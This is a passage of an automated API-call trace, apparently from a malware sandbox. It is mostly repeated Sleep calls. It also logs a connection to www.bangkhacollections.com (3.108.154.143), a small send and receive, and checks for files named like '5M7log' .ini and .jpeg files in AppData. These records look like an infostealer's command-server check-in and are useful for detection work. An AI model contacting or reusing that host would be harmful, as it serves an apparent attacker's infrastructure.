(dwMilliseconds=0x7d0) [0214.773] Sleep (dwMilliseconds=0x7d0) [0214.774] Sleep (dwMilliseconds=0x7d0) [0214.776] Sleep (dwMilliseconds=0x7d0) [0214.777] Sleep (dwMilliseconds=0x7d0) [0214.782] Sleep (dwMilliseconds=0x7d0) [0214.783] Sleep (dwMilliseconds=0x7d0) [0214.786] Sleep (dwMilliseconds=0x7d0) [0214.787] Sleep (dwMilliseconds=0x7d0) [0214.789] Sleep (dwMilliseconds=0x7d0) [0214.792] Sleep (dwMilliseconds=0x7d0) [0214.794] Sleep (dwMilliseconds=0x7d0) [0214.796] Sleep (dwMilliseconds=0x7d0) [0214.797] Sleep (dwMilliseconds=0x7d0) [0214.799] Sleep (dwMilliseconds=0x7d0) [0214.800] Sleep (dwMilliseconds=0x7d0) [0214.803] Sleep (dwMilliseconds=0x7d0) [0214.804] Sleep (dwMilliseconds=0x7d0) [0214.806] Sleep (dwMilliseconds=0x7d0) [0214.807] Sleep (dwMilliseconds=0x7d0) [0214.809] Sleep (dwMilliseconds=0x7d0) [0214.810] Sleep (dwMilliseconds=0x7d0) [0214.813] Sleep (dwMilliseconds=0x7d0) [0214.815] Sleep (dwMilliseconds=0x7d0) [0214.816] Sleep (dwMilliseconds=0x7d0) [0214.818] Sleep (dwMilliseconds=0x7d0) [0214.819] Sleep (dwMilliseconds=0x7d0) [0214.821] Sleep (dwMilliseconds=0x7d0) [0214.825] Sleep (dwMilliseconds=0x7d0) [0214.826] Sleep (dwMilliseconds=0x7d0) [0214.828] Sleep (dwMilliseconds=0x7d0) [0214.829] Sleep (dwMilliseconds=0x7d0) [0214.831] Sleep (dwMilliseconds=0x7d0) [0214.832] Sleep (dwMilliseconds=0x7d0) [0214.840] Sleep (dwMilliseconds=0x7d0) [0214.841] Sleep (dwMilliseconds=0x7d0) [0214.843] Sleep (dwMilliseconds=0x7d0) [0214.844] Sleep (dwMilliseconds=0x7d0) [0214.846] Sleep (dwMilliseconds=0x7d0) [0214.847] Sleep (dwMilliseconds=0x7d0) [0214.849] Sleep (dwMilliseconds=0x7d0) [0214.850] Sleep (dwMilliseconds=0x7d0) [0214.852] Sleep (dwMilliseconds=0x7d0) [0214.853] Sleep (dwMilliseconds=0x7d0) [0214.855] Sleep (dwMilliseconds=0x7d0) [0214.856] Sleep (dwMilliseconds=0x7d0) [0214.858] Sleep (dwMilliseconds=0x7d0) [0214.862] Sleep (dwMilliseconds=0x7d0) [0214.863] Sleep (dwMilliseconds=0x7d0) [0214.865] Sleep (dwMilliseconds=0x7d0) [0214.866] Sleep (dwMilliseconds=0x7d0) [0214.868] Sleep (dwMilliseconds=0x7d0) [0214.873] Sleep (dwMilliseconds=0x7d0) [0214.874] Sleep (dwMilliseconds=0x7d0) [0214.876] Sleep (dwMilliseconds=0x7d0) [0214.877] Sleep (dwMilliseconds=0x7d0) [0214.879] Sleep (dwMilliseconds=0x7d0) [0214.883] Sleep (dwMilliseconds=0x7d0) [0214.885] Sleep (dwMilliseconds=0x7d0) [0214.886] Sleep (dwMilliseconds=0x7d0) [0214.888] Sleep (dwMilliseconds=0x7d0) [0214.889] Sleep (dwMilliseconds=0x7d0) [0214.891] Sleep (dwMilliseconds=0x7d0) [0214.892] Sleep (dwMilliseconds=0x7d0) [0214.894] Sleep (dwMilliseconds=0x7d0) [0214.895] Sleep (dwMilliseconds=0x7d0) [0214.897] Sleep (dwMilliseconds=0x7d0) [0214.898] Sleep (dwMilliseconds=0x7d0) [0214.900] Sleep (dwMilliseconds=0x7d0) [0214.901] Sleep (dwMilliseconds=0x7d0) [0214.907] Sleep (dwMilliseconds=0x7d0) [0214.909] Sleep (dwMilliseconds=0x7d0) [0214.910] Sleep (dwMilliseconds=0x7d0) [0214.912] Sleep (dwMilliseconds=0x7d0) [0214.916] Sleep (dwMilliseconds=0x7d0) [0214.917] Sleep (dwMilliseconds=0x7d0) [0214.919] Sleep (dwMilliseconds=0x7d0) [0214.920] Sleep (dwMilliseconds=0x7d0) [0214.922] Sleep (dwMilliseconds=0x7d0) [0214.923] Sleep (dwMilliseconds=0x7d0) [0214.927] Sleep (dwMilliseconds=0x7d0) [0214.929] Sleep (dwMilliseconds=0x7d0) [0214.930] Sleep (dwMilliseconds=0x7d0) [0214.932] Sleep (dwMilliseconds=0x7d0) [0214.933] Sleep (dwMilliseconds=0x7d0) [0214.935] Sleep (dwMilliseconds=0x7d0) [0214.936] Sleep (dwMilliseconds=0x7d0) [0214.938] Sleep (dwMilliseconds=0x7d0) [0214.939] Sleep (dwMilliseconds=0x7d0) [0214.941] Sleep (dwMilliseconds=0x7d0) [0214.942] Sleep (dwMilliseconds=0x7d0) [0214.944] Sleep (dwMilliseconds=0x7d0) [0214.945] Sleep (dwMilliseconds=0x7d0) [0214.947] Sleep (dwMilliseconds=0x7d0) [0214.950] Sleep (dwMilliseconds=0x7d0) [0214.951] Sleep (dwMilliseconds=0x7d0) [0214.953] Sleep (dwMilliseconds=0x7d0) [0214.954] Sleep (dwMilliseconds=0x7d0) [0214.956] Sleep (dwMilliseconds=0x7d0) [0214.960] Sleep (dwMilliseconds=0x7d0) [0214.961] Sleep (dwMilliseconds=0x7d0) [0214.963] Sleep (dwMilliseconds=0x7d0) [0214.964] Sleep (dwMilliseconds=0x7d0) [0214.966] Sleep (dwMilliseconds=0x7d0) [0214.967] Sleep (dwMilliseconds=0x7d0) [0214.969] Sleep (dwMilliseconds=0x7d0) [0214.970] Sleep (dwMilliseconds=0x7d0) [0214.972] Sleep (dwMilliseconds=0x7d0) [0214.973] Sleep (dwMilliseconds=0x7d0) [0214.975] Sleep (dwMilliseconds=0x7d0) [0214.976] Sleep (dwMilliseconds=0x7d0) [0214.978] Sleep (dwMilliseconds=0x7d0) [0214.979] Sleep (dwMilliseconds=0x7d0) [0214.983] Sleep (dwMilliseconds=0x7d0) [0214.984] Sleep (dwMilliseconds=0x7d0) [0214.986] Sleep (dwMilliseconds=0x7d0) [0214.987] Sleep (dwMilliseconds=0x7d0) [0214.989] Sleep (dwMilliseconds=0x7d0) [0214.993] Sleep (dwMilliseconds=0x7d0) [0214.994] Sleep (dwMilliseconds=0x7d0) [0214.996] Sleep (dwMilliseconds=0x7d0) [0214.997] Sleep (dwMilliseconds=0x7d0) [0214.999] Sleep (dwMilliseconds=0x7d0) [0215.000] Sleep (dwMilliseconds=0x7d0) [0215.006] Sleep (dwMilliseconds=0x7d0) [0215.008] Sleep (dwMilliseconds=0x7d0) [0215.009] Sleep (dwMilliseconds=0x7d0) [0215.011] Sleep (dwMilliseconds=0x7d0) [0215.012] Sleep (dwMilliseconds=0x7d0) [0215.014] Sleep (dwMilliseconds=0x7d0) [0215.015] Sleep (dwMilliseconds=0x7d0) [0215.017] Sleep (dwMilliseconds=0x7d0) [0215.019] Sleep (dwMilliseconds=0x7d0) [0215.020] Sleep (dwMilliseconds=0x7d0) [0215.022] Sleep (dwMilliseconds=0x7d0) [0215.028] Sleep (dwMilliseconds=0x7d0) [0215.030] Sleep (dwMilliseconds=0x7d0) [0215.031] Sleep (dwMilliseconds=0x7d0) [0215.032] Sleep (dwMilliseconds=0x7d0) [0215.038] Sleep (dwMilliseconds=0x7d0) [0215.039] Sleep (dwMilliseconds=0x7d0) [0215.041] Sleep (dwMilliseconds=0x7d0) [0215.042] Sleep (dwMilliseconds=0x7d0) [0215.044] Sleep (dwMilliseconds=0x7d0) [0215.049] Sleep (dwMilliseconds=0x7d0) [0215.050] Sleep (dwMilliseconds=0x7d0) [0215.052] Sleep (dwMilliseconds=0x7d0) [0215.054] Sleep (dwMilliseconds=0x7d0) [0215.055] Sleep (dwMilliseconds=0x7d0) [0215.057] Sleep (dwMilliseconds=0x7d0) [0215.058] Sleep (dwMilliseconds=0x7d0) [0215.060] Sleep (dwMilliseconds=0x7d0) [0215.061] Sleep (dwMilliseconds=0x7d0) [0215.063] Sleep (dwMilliseconds=0x7d0) [0215.064] Sleep (dwMilliseconds=0x7d0) [0215.066] Sleep (dwMilliseconds=0x7d0) [0215.071] Sleep (dwMilliseconds=0x7d0) [0215.072] Sleep (dwMilliseconds=0x7d0) [0215.073] Sleep (dwMilliseconds=0x7d0) [0215.075] Sleep (dwMilliseconds=0x7d0) [0215.076] Sleep (dwMilliseconds=0x7d0) [0215.081] Sleep (dwMilliseconds=0x7d0) [0215.083] Sleep (dwMilliseconds=0x7d0) [0215.084] Sleep (dwMilliseconds=0x7d0) [0215.086] Sleep (dwMilliseconds=0x7d0) [0215.087] Sleep (dwMilliseconds=0x7d0) [0215.092] Sleep (dwMilliseconds=0x7d0) [0215.094] Sleep (dwMilliseconds=0x7d0) [0215.096] Sleep (dwMilliseconds=0x7d0) [0215.097] Sleep (dwMilliseconds=0x7d0) [0215.099] Sleep (dwMilliseconds=0x7d0) [0215.100] Sleep (dwMilliseconds=0x7d0) [0215.103] Sleep (dwMilliseconds=0x7d0) [0215.104] Sleep (dwMilliseconds=0x7d0) [0215.106] Sleep (dwMilliseconds=0x7d0) [0215.107] Sleep (dwMilliseconds=0x7d0) [0215.109] Sleep (dwMilliseconds=0x7d0) [0215.110] Sleep (dwMilliseconds=0x7d0) [0215.114] Sleep (dwMilliseconds=0x7d0) [0215.116] Sleep (dwMilliseconds=0x7d0) [0215.118] Sleep (dwMilliseconds=0x7d0) [0215.120] Sleep (dwMilliseconds=0x7d0) [0215.121] Sleep (dwMilliseconds=0x7d0) [0215.123] Sleep (dwMilliseconds=0x7d0) [0215.126] Sleep (dwMilliseconds=0x7d0) [0215.128] Sleep (dwMilliseconds=0x7d0) [0215.129] Sleep (dwMilliseconds=0x7d0) [0215.131] Sleep (dwMilliseconds=0x7d0) [0215.132] Sleep (dwMilliseconds=0x7d0) [0215.134] Sleep (dwMilliseconds=0x7d0) [0215.135] Sleep (dwMilliseconds=0x7d0) [0215.137] Sleep (dwMilliseconds=0x7d0) [0215.139] Sleep (dwMilliseconds=0x7d0) [0215.140] Sleep (dwMilliseconds=0x7d0) [0215.142] Sleep (dwMilliseconds=0x7d0) [0215.143] Sleep (dwMilliseconds=0x7d0) [0215.145] Sleep (dwMilliseconds=0x7d0) [0215.149] Sleep (dwMilliseconds=0x7d0) [0215.150] Sleep (dwMilliseconds=0x7d0) [0215.152] Sleep (dwMilliseconds=0x7d0) [0215.153] Sleep (dwMilliseconds=0x7d0) [0215.155] Sleep (dwMilliseconds=0x7d0) [0215.159] Sleep (dwMilliseconds=0x7d0) [0215.161] Sleep (dwMilliseconds=0x7d0) [0215.162] Sleep (dwMilliseconds=0x7d0) [0215.164] Sleep (dwMilliseconds=0x7d0) [0215.165] Sleep (dwMilliseconds=0x7d0) [0215.170] Sleep (dwMilliseconds=0x7d0) [0215.171] Sleep (dwMilliseconds=0x7d0) [0215.173] Sleep (dwMilliseconds=0x7d0) [0215.174] Sleep (dwMilliseconds=0x7d0) [0215.176] Sleep (dwMilliseconds=0x7d0) [0215.177] Sleep (dwMilliseconds=0x7d0) [0215.179] Sleep (dwMilliseconds=0x7d0) [0215.180] Sleep (dwMilliseconds=0x7d0) [0215.182] Sleep (dwMilliseconds=0x7d0) [0215.183] Sleep (dwMilliseconds=0x7d0) [0215.185] Sleep (dwMilliseconds=0x7d0) [0215.266] Sleep (dwMilliseconds=0x7d0) [0215.337] Sleep (dwMilliseconds=0x7d0) [0215.381] Sleep (dwMilliseconds=0x7d0) [0215.384] socket (af=2, type=1, protocol=6) returned 0x1f2c [0215.385] getaddrinfo (in: pNodeName="www.bangkhacollections.com", pServiceName="80", pHints=0x9e76478*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e764a8 | out: ppResult=0x9e764a8*=0xa05e490*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f8d790*(sa_family=2, sin_port=0x50, sin_addr="3.108.154.143"), ai_next=0x0)) returned 0 [0215.643] connect (s=0x1f2c, name=0x9f8d790*(sa_family=2, sin_port=0x50, sin_addr="3.108.154.143"), namelen=16) returned 0 [0215.790] send (s=0x1f2c, buf=0x82e10fa*, len=180, flags=0) returned 180 [0215.791] setsockopt (s=0x1f2c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0215.791] recv (in: s=0x1f2c, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 506 [0215.954] closesocket (s=0x1f2c) returned 0 [0215.955] Sleep (dwMilliseconds=0x7d0) [0215.957] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.957] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.957] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0215.957] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07040) returned 1 [0215.957] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.957] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.957] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.957] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06740) returned 1 [0215.957] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.957] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.957] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.958] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06d70) returned 1 [0215.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.958] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.958] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.958] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.958] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.958] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.958] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.958] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.958] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.958] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.958] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.958] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.958] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06d70) returned 1 [0215.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.958] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.958] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.959] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06740) returned 1 [0215.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.959] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.959] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.959] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.959] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.959] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0215.959] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.959] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.959] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0215.959] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e08360) returned 1 [0215.959] Sleep (dwMilliseconds=0x7d0) [0215.960] Sleep (dwMilliseconds=0x7d0) [0215.962] Sleep (dwMilliseconds=0x7d0) [0215.963] Sleep (dwMilliseconds=0x7d0) [0215.965] Sleep (dwMilliseconds=0x7d0) [0215.966] Sleep (dwMilliseconds=0x7d0) [0215.969] Sleep (dwMilliseconds=0x7d0) [0215.971] Sleep (dwMilliseconds=0x7d0) [0215.972] Sleep (dwMilliseconds=0x7d0) [0215.974] Sleep (dwMilliseconds=0x7d0) [0215.975] Sleep (dwMilliseconds=0x7d0) [0215.977] Sleep (dwMilliseconds=0x7d0) 